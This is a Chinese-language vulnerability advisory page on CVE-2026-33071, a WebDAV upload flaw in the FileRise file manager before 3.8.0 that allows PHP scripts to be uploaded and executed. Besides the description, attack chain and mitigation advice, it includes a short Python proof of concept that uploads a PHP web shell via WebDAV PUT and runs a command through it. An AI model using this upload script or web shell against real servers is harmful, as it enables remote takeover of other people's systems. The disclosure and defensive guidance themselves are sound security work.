IPBUF安全漏洞报告
English
CVE-2026-33071 CVSS 4.3 中危

CVE-2026-33071 FileRise WebDAV远程代码执行漏洞

披露日期: 2026-03-20

漏洞信息

漏洞编号
CVE-2026-33071
漏洞类型
远程代码执行
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
FileRise

相关标签

远程代码执行文件上传WebDAVFileRiseCVE-2026-33071

漏洞概述

FileRise是一款自托管的Web文件管理器及WebDAV服务器。在3.8.0版本之前,其WebDAV上传端点存在严重的文件类型验证绕过漏洞。与常规上传接口不同,WebDAV接口未对文件扩展名进行校验,允许攻击者上传.phtml、.php5等服务器端可执行脚本。在缺乏Apache LocationMatch特定保护的非默认部署环境中,攻击者可利用此缺陷上传恶意文件,进而导致服务器被远程控制并执行任意代码。

技术细节

该漏洞源于FileRise代码中对不同上传入口的处理逻辑不一致。常规的上传功能在`UploadModel::upload()`方法中使用了`REGEX_FILE_NAME`正则表达式来严格过滤文件名,从而阻止可执行文件的上传。然而,在WebDAV功能模块中,`FileRiseDirectory.php`的`createFile()`方法和`FileRiseFile.php`的`put()`方法直接从WebDAV客户端获取文件名,并未调用任何验证逻辑。这种差异使得攻击者可以通过WebDAV协议 PUT 请求绕过安全检查。虽然默认部署可能依赖Apache的LocationMatch指令来防止执行,但在未正确应用此配置的服务器上,上传的恶意PHP文件即可被Web服务器解析,实现远程代码执行。

攻击链分析

STEP 1
侦察
攻击者识别目标服务器运行FileRise且版本低于3.8.0,并确认开启了WebDAV服务。
STEP 2
利用
攻击者构造恶意PHP脚本,通过WebDAV协议的PUT方法将其上传至服务器,绕过文件扩展名验证。
STEP 3
执行
攻击者通过浏览器或HTTP工具访问上传的恶意脚本URL,触发服务器端解析并执行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com/webdav/" shell_filename = "shell.php" malicious_code = "<?php system($_GET['cmd']); ?>" # WebDAV PUT request to upload the malicious file headers = { "Content-Type": "application/octet-stream" } print(f"[*] Attempting to upload {shell_filename}...") response = requests.put(target_url + shell_filename, data=malicious_code, headers=headers) if response.status_code == 201 or response.status_code == 200: print(f"[+] File uploaded successfully.") # Attempt to execute the uploaded file exec_url = f"http://example.com/uploads/{shell_filename}?cmd=whoami" print(f"[*] Triggering payload at: {exec_url}") r = requests.get(exec_url) print("[+] Response:") print(r.text) else: print(f"[-] Upload failed with status code: {response.status_code}")

影响范围

FileRise < 3.8.0

防御指南

临时缓解措施
建议立即将FileRise升级到最新版本以修复此漏洞。如果暂时无法升级,请检查并强化Web服务器配置,确保文件上传目录(特别是WebDAV目录)禁止解析PHP等服务器端脚本,或者考虑暂时禁用WebDAV服务接口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表